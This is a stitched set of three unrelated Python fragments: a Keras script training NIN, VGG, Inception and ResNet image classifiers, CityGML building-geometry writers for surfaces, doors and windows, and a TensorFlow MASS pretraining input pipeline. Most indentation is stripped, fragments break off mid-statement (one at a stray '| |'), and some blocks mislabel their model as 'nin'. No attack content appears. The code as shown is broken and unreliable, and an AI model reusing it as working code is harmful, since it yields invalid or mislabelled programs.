plot_train_vlad_curve(history)
if needTestNin:
new_model = keras.models.load_model('checkpoint/cp_nin.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('nin', 100 * acc))
#endregion
#region VGG
from dlexp.model import vgg
needTrainVGG = False
needTestVGG = False
optimizer = Adam(lr=.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
if needTrainVGG:
vgg.net.build(input_shape)
vgg.net.summary()
vgg.net.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=["accuracy"])
log_filepath = 'checkpoint/log_vgg'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_vgg.h5'
    cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only=True)
cbks = [tb_cb, cp_cb]
history = vgg.net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
vgg.net.save('checkpoint/vgg_model.h5')
# model = tf.keras.models.load_model('vgg_model.h5')
plot_train_vlad_curve(history)
if needTestVGG:
new_model = keras.models.load_model('checkpoint/cp_vgg.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('vgg', 100 * acc))
#endregion
#region Inception
from dlexp.model import inception
needTrainInc = False
needTestInc = False
if needTrainInc:
net = inception.build_net([28,28,1])
net.summary()
optimizer = Adam(lr=.005, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
net.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=["accuracy"])
log_filepath = 'checkpoint/log_inception'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_inception.h5'
    cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only=True)
cbks = [tb_cb, cp_cb]
history = net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
net.save('checkpoint/inception_model.h5')
# model = tf.keras.models.load_model('nin_model.h5')
plot_train_vlad_curve(history)
if needTestInc:
new_model = keras.models.load_model('checkpoint/cp_inception.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('nin', 100 * acc))
#endregion
#region ResNet
from dlexp.model import resnet
needTrainResnet = False
needTestResnet = False
if needTrainResnet:
net = resnet.build_net([28, 28, 1])
net.summary()
optimizer = Adam(lr=.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
net.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=["accuracy"])
log_filepath = 'checkpoint/log_resnet'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_resnet.h5'
    cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only=True)
cbks = [tb_cb, cp_cb]
history = net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
net.save('checkpoint/resnet_model.h5')
# model = tf.keras.models.load_model('nin_model.h5')
plot_train_vlad_curve(history)
if needTestResnet:
new_model = keras.models.load_model('checkpoint/cp_resnet.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, | |
        dw = [[], [], [], []]
ew = [[], [], [], []]
dw[0] = [dList[4][0] + window, dList[4][1], dList[4][2] - window]
dw[1] = [dList[1][0] + window, dList[1][1], dList[1][2] + window]
dw[2] = [dList[2][0] - window, dList[2][1], dList[2][2] + window]
dw[3] = [dList[5][0] - window, dList[5][1], dList[5][2] - window]
ew[0] = [dList[4][0] + window, dList[4][1] + embrasure, dList[4][2] - window]
ew[1] = [dList[1][0] + window, dList[1][1] + embrasure, dList[1][2] + window]
ew[2] = [dList[2][0] - window, dList[2][1] + embrasure, dList[2][2] + window]
ew[3] = [dList[5][0] - window, dList[5][1] + embrasure, dList[5][2] - window]
elif side == 2:
dw = [[], [], [], []]
ew = [[], [], [], []]
dw[0] = [dList[4][0] - window, dList[4][1], dList[4][2] - window]
dw[1] = [dList[1][0] - window, dList[1][1], dList[1][2] + window]
dw[2] = [dList[2][0] + window, dList[2][1], dList[2][2] + window]
dw[3] = [dList[5][0] + window, dList[5][1], dList[5][2] - window]
ew[0] = [dList[4][0] - window, dList[4][1] - embrasure, dList[4][2] - window]
ew[1] = [dList[1][0] - window, dList[1][1] - embrasure, dList[1][2] + window]
ew[2] = [dList[2][0] + window, dList[2][1] - embrasure, dList[2][2] + window]
ew[3] = [dList[5][0] + window, dList[5][1] - embrasure, dList[5][2] - window]
dwring = GMLPointList(dw[0]) + ' ' + GMLPointList(dw[3]) + ' ' + GMLPointList(dw[2]) + ' ' + GMLPointList(dw[1]) + ' ' + GMLPointList(dw[0])
addsurface(skipsm, cs, d4, [dwring])
dw0 = GMLPointList(dw[0]) + ' ' + GMLPointList(dw[1]) + ' ' + GMLPointList(ew[1]) + ' ' + GMLPointList(ew[0]) + ' ' + GMLPointList(dw[0])
dw1 = GMLPointList(dw[1]) + ' ' + GMLPointList(dw[2]) + ' ' + GMLPointList(ew[2]) + ' ' + GMLPointList(ew[1]) + ' ' + GMLPointList(dw[1])
dw2 = GMLPointList(dw[3]) + ' ' + GMLPointList(ew[3]) + ' ' + GMLPointList(ew[2]) + ' ' + GMLPointList(dw[2]) + ' ' + GMLPointList(dw[3])
dw3 = GMLPointList(dw[3]) + ' ' + GMLPointList(dw[0]) + ' ' + GMLPointList(ew[0]) + ' ' + GMLPointList(ew[3]) + ' ' + GMLPointList(dw[3])
ew0 = GMLPointList(ew[0]) + ' ' + GMLPointList(ew[1]) + ' ' + GMLPointList(ew[2]) + ' ' + GMLPointList(ew[3]) + ' ' + GMLPointList(ew[0])
addsurface(skipsm, cs, dw0)
addsurface(skipsm, cs, dw1)
addsurface(skipsm, cs, dw2)
addsurface(skipsm, cs, dw3)
addsurface(skipsm, cs, ew0)
else:
d4 = dListGML[4] + ' ' + dListGML[1] + ' ' + dListGML[2] + ' ' + dListGML[5] + ' ' + dListGML[4]
addsurface(skipsm, cs, d4)
def plainMultiSurface(surfaceMember, coords, interior=None):
"""Adds a polygon to the SurfaceMember."""
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = coords
if interior and interior[0] is not None:
for hole in interior:
PolygonInterior = etree.SubElement(Polygon, "{%s}interior" % ns_gml)
LinearRing = etree.SubElement(PolygonInterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = hole
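# For reference (schematic of the GML fragment produced by plainMultiSurface above):
#   <gml:Polygon gml:id="...">            <- gml:id only when ASSIGNID is set
#     <gml:exterior><gml:LinearRing><gml:posList>coords</gml:posList></gml:LinearRing></gml:exterior>
#     <gml:interior>...</gml:interior>    <- one per entry in `interior`
#   </gml:Polygon>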
def multiSurface(bldg, coords, semantics, interior=None, LOD=None, opening=None):
"""
Write a surface with input coordinates.
Input: coordinates of the LinearRing.
    Output: MultiSurface.
"""
boundedBy = etree.SubElement(bldg, "{%s}boundedBy" % ns_bldg)
semanticSurface = etree.SubElement(boundedBy, "{%s}%s" % (ns_bldg, semantics))
if LOD == 3:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod3MultiSurface" % ns_bldg)
elif LOD == 2:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
else:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
MultiSurface = etree.SubElement(lodXMultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = coords
if interior and interior[0] is not None:
for hole in interior:
PolygonInterior = etree.SubElement(Polygon, "{%s}interior" % ns_gml)
LinearRing = etree.SubElement(PolygonInterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = hole
if opening:
dooropening = opening[0]
if dooropening != []:
gmlopening = etree.SubElement(semanticSurface, "{%s}opening" % ns_bldg)
gmldoor = etree.SubElement(gmlopening, "{%s}Door" % ns_bldg)
lod3MultiSurface = etree.SubElement(gmldoor, "{%s}lod3MultiSurface" % ns_bldg)
DoorMultiSurface = etree.SubElement(lod3MultiSurface, "{%s}MultiSurface" % ns_gml)
DoorsurfaceMember = etree.SubElement(DoorMultiSurface, "{%s}surfaceMember" % ns_gml)
DoorPolygon = etree.SubElement(DoorsurfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
DoorPolygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
DoorPolygonExterior = etree.SubElement(DoorPolygon, "{%s}exterior" % ns_gml)
DoorLinearRing = etree.SubElement(DoorPolygonExterior, "{%s}LinearRing" % ns_gml)
DoorposList = etree.SubElement(DoorLinearRing, "{%s}posList" % ns_gml)
DoorposList.text = GMLreversedRing(dooropening['ring'])
if len(opening[1]) > 0:
for win in opening[1]:
#print win
gmlopening = etree.SubElement(semanticSurface, "{%s}opening" % ns_bldg)
gmlwin = etree.SubElement(gmlopening, "{%s}Window" % ns_bldg)
lod3MultiSurface = etree.SubElement(gmlwin, "{%s}lod3MultiSurface" % ns_bldg)
DoorMultiSurface = etree.SubElement(lod3MultiSurface, "{%s}MultiSurface" % ns_gml)
DoorsurfaceMember = etree.SubElement(DoorMultiSurface, "{%s}surfaceMember" % ns_gml)
DoorPolygon = etree.SubElement(DoorsurfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
DoorPolygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
DoorPolygonExterior = etree.SubElement(DoorPolygon, "{%s}exterior" % ns_gml)
DoorLinearRing = etree.SubElement(DoorPolygonExterior, "{%s}LinearRing" % ns_gml)
DoorposList = etree.SubElement(DoorLinearRing, "{%s}posList" % ns_gml)
DoorposList.text = GMLreversedRing(win['ring'])
def multiSurface2(bldg, coords, semantics, interior=None, LOD=None, window=None):
"""
Write a surface with input coordinates.
Input: coordinates of the LinearRing.
Output: MultiSurface.
"""
boundedBy = etree.SubElement(bldg, "{%s}boundedBy" % ns_bldg)
semanticSurface = etree.SubElement(boundedBy, "{%s}%s" % (ns_bldg, semantics))
if LOD == 3:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod3MultiSurface" % ns_bldg)
elif LOD == 2:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
else:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
MultiSurface = etree.SubElement(lodXMultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = coords
if interior and interior[0] is not None:
for hole in interior:
PolygonInterior = etree.SubElement(Polygon, "{%s}interior" % ns_gml)
LinearRing = etree.SubElement(PolygonInterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = hole
if window:
if len(window) > 0:
for win in window:
#print win
gmlopening = etree.SubElement(semanticSurface, "{%s}opening" % ns_bldg)
gmlwin = etree.SubElement(gmlopening, "{%s}Window" % ns_bldg)
lod3MultiSurface = etree.SubElement(gmlwin, "{%s}lod3MultiSurface" % ns_bldg)
DoorMultiSurface = etree.SubElement(lod3MultiSurface, "{%s}MultiSurface" % ns_gml)
DoorsurfaceMember = etree.SubElement(DoorMultiSurface, "{%s}surfaceMember" % ns_gml)
DoorPolygon = etree.SubElement(DoorsurfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
DoorPolygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
DoorPolygonExterior = etree.SubElement(DoorPolygon, "{%s}exterior" % ns_gml)
DoorLinearRing = etree.SubElement(DoorPolygonExterior, "{%s}LinearRing" % ns_gml)
DoorposList = etree.SubElement(DoorLinearRing, "{%s}posList" % ns_gml)
DoorposList.text = win
def multiSurfaceWithEmbrasure(bldg, coords, semantics, interior=None, LOD=None, embO=None):
"""
Write a surface with input coordinates, taking into account the embrasures.
Input: coordinates of the LinearRing.
    Output: MultiSurface.
"""
boundedBy = etree.SubElement(bldg, "{%s}boundedBy" % ns_bldg)
semanticSurface = etree.SubElement(boundedBy, "{%s}%s" % (ns_bldg, semantics))
if LOD == 3:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod3MultiSurface" % ns_bldg)
elif LOD == 2:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
else:
lodXMultiSurface = etree.SubElement(semanticSurface, "{%s}lod2MultiSurface" % ns_bldg)
MultiSurface = etree.SubElement(lodXMultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = coords
if interior and interior[0] is not None:
for hole in interior:
PolygonInterior = etree.SubElement(Polygon, "{%s}interior" % ns_gml)
LinearRing = etree.SubElement(PolygonInterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = hole
for opening in embO:
for s in opening['surfaces']:
# MultiSurface = etree.SubElement(lodXMultiSurface, "{%s}MultiSurface" % ns_gml)
surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = s
for o in opening['openings']:
gmlopening = etree.SubElement(semanticSurface, "{%s}opening" % ns_bldg)
if opening['type'] == 'Door':
gmldoor = etree.SubElement(gmlopening, "{%s}Door" % ns_bldg)
elif opening['type'] == 'Window':
gmldoor = etree.SubElement(gmlopening, "{%s}Window" % ns_bldg)
else:
raise ValueError("Door or window allowed.")
lod3MultiSurface = etree.SubElement(gmldoor, "{%s}lod3MultiSurface" % ns_bldg)
DoorMultiSurface = etree.SubElement(lod3MultiSurface, "{%s}MultiSurface" % ns_gml)
DoorsurfaceMember = etree.SubElement(DoorMultiSurface, "{%s}surfaceMember" % ns_gml)
DoorPolygon = etree.SubElement(DoorsurfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
DoorPolygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
DoorPolygonExterior = etree.SubElement(DoorPolygon, "{%s}exterior" % ns_gml)
DoorLinearRing = etree.SubElement(DoorPolygonExterior, "{%s}LinearRing" % ns_gml)
DoorposList = etree.SubElement(DoorLinearRing, "{%s}posList" % ns_gml)
            DoorposList.text = o  # each opening entry is already a posList ring string
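# Note on the `embO` argument consumed above (inferred from the loop in
# multiSurfaceWithEmbrasure): each entry is expected to be a dict of the form
#   {'type': 'Door' or 'Window',
#    'surfaces': [posList strings for the embrasure faces],
#    'openings': [posList strings for the opening rings]}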
def multiSurfaceLOD0(bldg, coords, footedge):
"""
Write a surface with input coordinates.
Input: coordinates of the LinearRing.
Output: MultiSurface.
"""
if footedge == "footprint":
lod0MultiSurface = etree.SubElement(bldg, "{%s}lod0FootPrint" % ns_bldg)
elif footedge == "roofedge":
lod0MultiSurface = etree.SubElement(bldg, "{%s}lod0RoofEdge" % ns_bldg)
MultiSurface = etree.SubElement(lod0MultiSurface, "{%s}MultiSurface" % ns_gml)
    surfaceMember = etree.SubElement(MultiSurface, "{%s}surfaceMember" % ns_gml)
"""Create mass input function for TPUEstimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
from absl import flags
import absl.logging as _logging # pylint: disable=unused-import
import numpy as np
import tensorflow as tf
# pylint: disable=g-import-not-at-top
try:
from google3.experimental.users.zihangd.pretrain.data_utils import type_cast
from google3.experimental.users.zihangd.pretrain.data_utils import sparse_to_dense
from google3.experimental.users.zihangd.pretrain.mlm_input_func_builder import chunk_to_sequence
from google3.experimental.users.zihangd.pretrain.mlm_input_func_builder import create_target_mapping
from google3.experimental.users.zihangd.pretrain.mlm_input_func_builder import discrepancy_correction
except ImportError as e:
from data_utils import type_cast
from data_utils import sparse_to_dense
from mlm_input_func_builder import chunk_to_sequence
from mlm_input_func_builder import create_target_mapping
from mlm_input_func_builder import discrepancy_correction
# pylint: enable=g-import-not-at-top
FLAGS = flags.FLAGS
flags.DEFINE_bool("origin_pos", default=False,
help="Use the original enc position for the dec inputs.")
def _idx_pair_to_mask(beg_indices, end_indices, inputs, tgt_len, num_predict):
"""Turn begin and end indices into actual mask."""
non_func_mask = tf.not_equal(inputs, FLAGS.eos_id)
all_indices = tf.where(
non_func_mask,
tf.range(tgt_len, dtype=tf.int64),
tf.constant(-1, shape=[tgt_len], dtype=tf.int64))
candidate_matrix = tf.cast(
tf.logical_and(
all_indices[None, :] >= beg_indices[:, None],
all_indices[None, :] < end_indices[:, None]),
tf.float32)
cumsum_matrix = tf.reshape(
tf.cumsum(tf.reshape(candidate_matrix, [-1])),
[-1, tgt_len])
masked_matrix = (tf.cast(cumsum_matrix <= num_predict, tf.float32)
* candidate_matrix)
target_mask = tf.reduce_sum(masked_matrix, axis=0)
is_masked = tf.cast(target_mask, tf.bool)
segment_range = tf.cast(tf.range(1, tf.shape(candidate_matrix)[0] + 1),
dtype=candidate_matrix.dtype)
segment_matrix = segment_range[:, None] * candidate_matrix
segment_ids = tf.reduce_sum(segment_matrix * masked_matrix, axis=0)
segment_ids = tf.cast(segment_ids, dtype=inputs.dtype)
pos_mat = tf.cumsum(candidate_matrix, axis=1, exclusive=True)
pos_seq = tf.reduce_sum(pos_mat * masked_matrix, axis=0)
return is_masked, segment_ids, pos_seq
def _token_span_mask(inputs, tgt_len, num_predict):
"""Sample token spans as prediction targets."""
mask_alpha = tgt_len / num_predict
round_to_int = lambda x: tf.cast(x, tf.int64)
# Sample span lengths from a zipf distribution
span_len_seq = np.arange(FLAGS.min_tok, FLAGS.max_tok + 1)
probs = np.array([1.0 / (i + 1) for i in span_len_seq])
probs /= np.sum(probs)
logits = tf.constant(np.log(probs), dtype=tf.float32)
span_lens = tf.random.categorical(
logits=logits[None],
num_samples=num_predict,
dtype=tf.int64,
)[0] + FLAGS.min_tok
# Sample the ratio [0.0, 1.0) of left context lengths
span_lens_float = tf.cast(span_lens, tf.float32)
left_ratio = tf.random.uniform(shape=[num_predict], minval=0.0, maxval=1.0)
left_ctx_len = left_ratio * span_lens_float * (mask_alpha - 1)
left_ctx_len = round_to_int(left_ctx_len)
# Compute the offset from left start to the right end
right_offset = round_to_int(span_lens_float * mask_alpha) - left_ctx_len
# Get the actual begin and end indices
beg_indices = (tf.cumsum(left_ctx_len) +
tf.cumsum(right_offset, exclusive=True))
end_indices = beg_indices + span_lens
# Remove out of range indices
valid_idx_mask = end_indices <= tgt_len
beg_indices = tf.boolean_mask(beg_indices, valid_idx_mask)
end_indices = tf.boolean_mask(end_indices, valid_idx_mask)
# Shuffle valid indices
num_valid = tf.cast(tf.shape(beg_indices)[0], tf.int64)
order = tf.random_shuffle(tf.range(num_valid, dtype=tf.int64))
beg_indices = tf.gather(beg_indices, order)
end_indices = tf.gather(end_indices, order)
return _idx_pair_to_mask(beg_indices, end_indices, inputs, tgt_len,
num_predict)
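# Illustrative numbers (added for clarity, not executed): with tgt_len=512 and
# num_predict=85, mask_alpha is about 6, so a sampled span of length L is embedded
# in a budget of roughly 6*L positions; left_ctx_len takes a uniform share of the
# slack, right_offset covers the rest, and spans running past tgt_len are dropped.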
def create_mass_target(example, seq_len, num_predict, use_bfloat16):
"""docs."""
inputs = example["inputs"]
# sample mask
is_masked, segment_ids, pos_seq = _token_span_mask(
inputs, seq_len, num_predict)
# get masked input (encoder input)
masked_input = discrepancy_correction(inputs, is_masked, seq_len)
example["enc_inp"] = tf.reshape(masked_input, [seq_len])
example["enc_pos"] = tf.range(seq_len, dtype=pos_seq.dtype)
if FLAGS.origin_pos:
pos_seq = example["enc_pos"] - 1
# create target mapping
create_target_mapping(example, is_masked, seq_len, num_predict,
target=inputs, dec_seg=segment_ids, dec_pos=pos_seq,
dec_type=example["type_id"])
# example["dec_pos"] = tf.range(num_predict, dtype=pos_seq.dtype)
# construct decoder input
target = example["target"]
eos_tensor = tf.constant(FLAGS.eos_id, shape=[1], dtype=target.dtype)
dec_inp = tf.concat([eos_tensor, target[:-1]], 0)
seg_ids = example["dec_seg"]
eos_mask = tf.not_equal(tf.concat([seg_ids[:1], seg_ids[:-1]], 0), seg_ids)
dec_inp = tf.where(eos_mask,
tf.broadcast_to(eos_tensor, [num_predict]),
dec_inp)
example["dec_inp"] = dec_inp
# type cast for example
type_cast(example, use_bfloat16)
for k, v in example.items():
tf.logging.info("%s: %s", k, v)
return example
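# Toy illustration of the decoder input built above (added for clarity): if
# target = [a, b, c, d] and dec_seg = [1, 1, 2, 2], then dec_inp = [eos, a, eos, c],
# i.e. the target shifted right by one with an extra eos wherever a new masked
# span (segment) begins.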
def mass_process(dataset, seq_len, num_predict, use_bfloat16):
"""Process input tfrecords into proper format for MASS training."""
dataset = chunk_to_sequence(dataset, seq_len)
# Create mass target
create_mass_target_mapper = functools.partial(
create_mass_target,
seq_len=seq_len,
num_predict=num_predict,
use_bfloat16=use_bfloat16)
dataset = dataset.map(create_mass_target_mapper, num_parallel_calls=64)
return dataset
def get_record_parser():
"""Config tfrecord parser."""
def parser(record):
"""function used to parse tfrecord."""
record_spec = {
"inputs": tf.VarLenFeature(tf.int64),
"type_id": tf.FixedLenFeature([1], tf.int64),
}
# retrieve serialized example
example = tf.parse_single_example(
serialized=record,
features=record_spec)
inputs = example["inputs"]
inp_len = tf.shape(inputs)[0]
# expand type id to full length
example["type_id"] = tf.broadcast_to(example["type_id"], [inp_len])
# convert all sparse example to dense
example = sparse_to_dense(example)
return example
return parser
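# Expected serialized record layout (as read by the parser above): a variable-length
# int64 "inputs" token sequence plus a single int64 "type_id"; the parser broadcasts
# type_id to the full input length and densifies the sparse features before the
# downstream chunking in mass_process().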
def parse_record(dataset,
parser,
is_training,
num_threads=64,
file_shuffle_size=None,
record_shuffle_size=None):
"""Parse tfrecords in a dataset."""
if is_training:
# file-level shuffle
if file_shuffle_size and file_shuffle_size > 1:
tf.logging.info("File level shuffle with size %d", file_shuffle_size)
dataset = dataset.shuffle(file_shuffle_size)
# `cycle_length` is the number of parallel files that get read.
cycle_length = min(8, file_shuffle_size)
tf.logging.info("Interleave %d files", cycle_length)
# `sloppy` mode means that the interleaving is not exact. This adds
# even more randomness to the training pipeline.
dataset = dataset.apply(
tf.contrib.data.parallel_interleave(
tf.data.TFRecordDataset,
sloppy=True,
cycle_length=cycle_length))
if record_shuffle_size and record_shuffle_size > 1:
tf.logging.info("Record level shuffle with size %d", record_shuffle_size)
dataset = dataset.shuffle(buffer_size=record_shuffle_size)
dataset = dataset.map(parser, num_parallel_calls=num_threads)
dataset = dataset.cache().repeat()
else:
dataset = tf.data.TFRecordDataset(dataset)
dataset = dataset.map(parser)
return dataset
def sent_mass_dataset(params,
file_names,
num_hosts,
num_core_per_host,
seq_len,
num_predict,
is_training,
use_bfloat16=False,
num_threads=64,
record_shuffle_size=4096,
sequence_shuffle_size=2048):
"""Get sentence level mass dataset."""
bsz_per_core = params["batch_size"]
if num_hosts > 1:
host_id = params["context"].current_host
else:
host_id = 0
##### Split input files across hosts
if len(file_names) >= num_hosts:
file_paths = file_names[host_id::num_hosts]
else:
file_paths = file_names
tf.logging.info("Host %d handles %d files:", host_id, len(file_paths))
##### Parse records
dataset = tf.data.Dataset.from_tensor_slices(file_paths)
dataset = parse_record(dataset=dataset,
parser=get_record_parser(),
is_training=is_training,
num_threads=num_threads,
file_shuffle_size=len(file_paths),
record_shuffle_size=record_shuffle_size)
# process dataset
dataset = mass_process(dataset, seq_len, num_predict, use_bfloat16)
# Sequence level shuffle
if is_training and sequence_shuffle_size:
tf.logging.info("Seqeunce level shuffle with size %d",
sequence_shuffle_size)
dataset = dataset.shuffle(buffer_size=sequence_shuffle_size)
# batching
dataset = dataset.batch(bsz_per_core, drop_remainder=True)
# Prefetch
dataset = dataset.prefetch(num_core_per_host)
return dataset
def semidoc_mass_dataset(params,
file_names,
num_hosts,
num_core_per_host,
seq_len,
num_predict,
is_training,
use_bfloat16=False,
num_threads=64,
record_shuffle_size=256,
sequence_shuffle_size=2048):
# pylint: disable=g-doc-args
"""Get semi-doc level mass dataset.
Notes:
- Each sequence comes from the same document (except for boundary cases).
This is different from the standard sent-level mass dataset.
- No consecutivity is ensured across batches, which is different from the
standard doc-level mass dataset.
- Effectively, semi-doc dataset maintains short range (seq_len) dependency,
which is more random than doc-level and less random than sent-level.
Returns:
a tf.data.Dataset
"""
# pylint: enable=g-doc-args
bsz_per_core = params["batch_size"]
if num_hosts > 1:
host_id = params["context"].current_host
else:
host_id = 0
##### Split input files across hosts
if len(file_names) >= num_hosts:
file_paths = file_names[host_id::num_hosts]
else:
file_paths = file_names
tf.logging.info("Host %d handles %d files:", host_id, len(file_paths))
##### Parse records
dataset = tf.data.Dataset.from_tensor_slices(file_paths)
dataset = parse_record(dataset=dataset,
parser=get_record_parser(),
is_training=is_training,
num_threads=num_threads,
file_shuffle_size=len(file_paths),
record_shuffle_size=record_shuffle_size)
# process dataset
dataset = mass_process(dataset, seq_len, num_predict, use_bfloat16)
# Sequence level shuffle
if is_training and sequence_shuffle_size:
tf.logging.info("Seqeunce level shuffle with size %d",
sequence_shuffle_size)
dataset = dataset.shuffle(buffer_size=sequence_shuffle_size)
# batching
dataset = dataset.batch(bsz_per_core, drop_remainder=True)
# Prefetch
dataset = dataset.prefetch(num_core_per_host)
return dataset
def doc_mass_dataset(params,
file_names,
num_hosts,
num_core_per_host,
seq_len,
num_predict,
is_training,
use_bfloat16=False,
num_threads=64,
record_shuffle_size=256):
"""Get document level mass dataset."""
bsz_per_core = params["batch_size"]
if num_hosts > 1:
host_id = params["context"].current_host
else:
host_id = 0
##### Split input files across hosts
if len(file_names) >= num_hosts:
file_paths = file_names[host_id::num_hosts]
else:
file_paths = file_names
tf.logging.info("Host %d handles %d files:", host_id, len(file_paths))
##### Create dataset from file_paths
dataset = tf.data.Dataset.from_tensor_slices(file_paths)
if len(file_paths) // bsz_per_core >= 2:
    ##### Enough input files, so do file-level sharding
# Split the dataset into `bsz_per_core` disjoint shards
shards = [dataset.shard(bsz_per_core, i) for i in range(bsz_per_core)]
# Parse records
file_shuffle_size = (len(file_paths) + bsz_per_core - 1) // bsz_per_core
parse_shard = functools.partial(
parse_record,
parser=get_record_parser(),
is_training=is_training,
num_threads=num_threads,
file_shuffle_size=file_shuffle_size,
record_shuffle_size=record_shuffle_size)
shards = [parse_shard(dataset=shard) for shard in shards]
else:
##### Not enough input files, so do record-level sharding
# Parse records
dataset = parse_record(dataset,
parser=get_record_parser(),
